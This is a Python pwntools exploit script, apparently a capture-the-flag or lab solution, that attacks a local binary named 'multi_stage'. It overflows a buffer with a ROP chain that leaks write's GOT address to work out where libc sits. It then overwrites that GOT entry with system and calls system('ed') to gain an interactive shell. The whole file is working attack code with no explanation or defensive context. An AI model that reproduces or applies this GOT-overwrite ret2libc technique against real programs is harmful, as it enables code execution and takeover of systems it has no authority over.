#!/usr/bin/python


from pwn import *

offset___libc_start_main_ret = 0x18e81
offset_system = 0x0003d200
offset_dup2 = 0x000e77c0
offset_read = 0x000e6cb0
offset_write = 0x000e6d80
offset_str_bin_sh = 0x17e0cf

read_plt = 0x08048300
write_plt = 0x08048320
write_got = 0x0804a014
new_system_plt = write_plt
ed_str = 0x8049243
pppr = 0x08048529
def main():
    p = process("./multi_stage")

    payload = "A" * 28
    payload += p32(write_plt) # 1. write(1, write_got, 4)
    payload += p32(pppr)
    payload += p32(1) #STDOUT
    payload += p32(write_got)
    payload += p32(4)
    payload += p32(read_plt) # 2. read(0, write_got, 4)
    payload += p32(pppr)
    payload += p32(0)
    payload += p32(write_got)
    payload += p32(4)
    payload += p32(new_system_plt) # 3. system("ed")
    payload += p32(0xdeadbeef)
    payload += p32(ed_str)




    p.send(payload)

    p.recv(16)

    # parse the leak
    leak = p.recv(4)
    write_addr = u32(leak)

    log.info("write_addr: 0x%x" % write_addr)

    libc_base = write_addr - offset_write
    log.info("libc_base: 0x%x" % libc_base)
    system_addr = libc_base + offset_system
    log.info("system_addr: 0x%x" % system_addr)
    p.send(p32(system_addr))


    p.interactive()


if __name__ == "__main__":
    main()